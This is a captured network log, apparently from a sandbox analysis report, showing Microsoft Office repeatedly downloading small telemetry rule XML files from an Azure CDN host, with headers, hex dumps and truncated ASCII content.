                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:59 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                48192.168.2.55543113.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:59 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:59 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:59 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 416
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                ETag: "0x8DC582BAEA4B445"
                                                                                x-ms-request-id: 75858473-001e-000b-318c-1515a7000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093359Z-15767c5fc55sdcjq8ksxt4n9mc00000001rg0000000023da
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:59 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                49192.168.2.55543513.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:59 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:59 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:59 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 479
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                ETag: "0x8DC582B989EE75B"
                                                                                x-ms-request-id: 76252b1b-c01e-0066-488c-15a1ec000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093359Z-15767c5fc55xsgnlxyxy40f4m00000000c70000000006vfc
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:59 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                50192.168.2.55543613.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:59 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:59 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:59 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 471
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                ETag: "0x8DC582B97E6FCDD"
                                                                                x-ms-request-id: b83a8dc4-f01e-003f-308c-15d19d000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093359Z-15767c5fc55rv8zjq9dg0musxg0000000ca0000000006pdg
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:59 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                51192.168.2.55543713.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:59 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:59 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:59 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 415
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                ETag: "0x8DC582BA80D96A1"
                                                                                x-ms-request-id: b9a197f6-401e-0078-3b8c-154d34000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093359Z-15767c5fc55kg97hfq5uqyxxaw0000000ceg000000000qbu
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:59 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                52192.168.2.55543813.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:33:59 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:59 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:59 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 419
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                ETag: "0x8DC582B9C710B28"
                                                                                x-ms-request-id: 2f8443ca-b01e-0070-308c-151cc0000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093359Z-15767c5fc55n4msds84xh4z67w0000000630000000002ee4
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:59 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                53192.168.2.55543913.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:00 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:00 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:00 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 477
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                ETag: "0x8DC582BA54DCC28"
                                                                                x-ms-request-id: 7be6812e-d01e-008e-528c-15387a000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093400Z-15767c5fc55fdfx81a30vtr1fw0000000chg00000000c3zq
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:00 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                54192.168.2.55544013.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:00 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:00 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:00 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 419
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                ETag: "0x8DC582BB7F164C3"
                                                                                x-ms-request-id: 1f480aea-c01e-002b-028c-156e00000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093400Z-15767c5fc554wklc0x4mc5pq0w0000000cm0000000008uhv
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:00 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                55192.168.2.55544113.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:00 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:00 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:00 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 477
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                ETag: "0x8DC582BA48B5BDD"
                                                                                x-ms-request-id: 7be6821c-d01e-008e-398c-15387a000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093400Z-15767c5fc55rg5b7sh1vuv8t7n0000000csg0000000019gx
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:00 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                56192.168.2.55544313.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:00 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:00 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:00 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 472
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                ETag: "0x8DC582BB650C2EC"
                                                                                x-ms-request-id: aa883537-b01e-0053-4c8c-15cdf8000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093400Z-15767c5fc55fdfx81a30vtr1fw0000000cn0000000008skr
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:00 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                57192.168.2.55544213.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:00 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:00 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:00 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 419
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                ETag: "0x8DC582B9FF95F80"
                                                                                x-ms-request-id: 16d3a614-701e-0032-288c-15a540000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093400Z-15767c5fc554wklc0x4mc5pq0w0000000ct00000000009ek
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:00 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                58192.168.2.55544613.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:01 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:01 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:01 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 468
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                ETag: "0x8DC582BB3EAF226"
                                                                                x-ms-request-id: cce0beff-001e-0082-398c-155880000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093401Z-15767c5fc55xsgnlxyxy40f4m00000000c7g0000000063qn
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
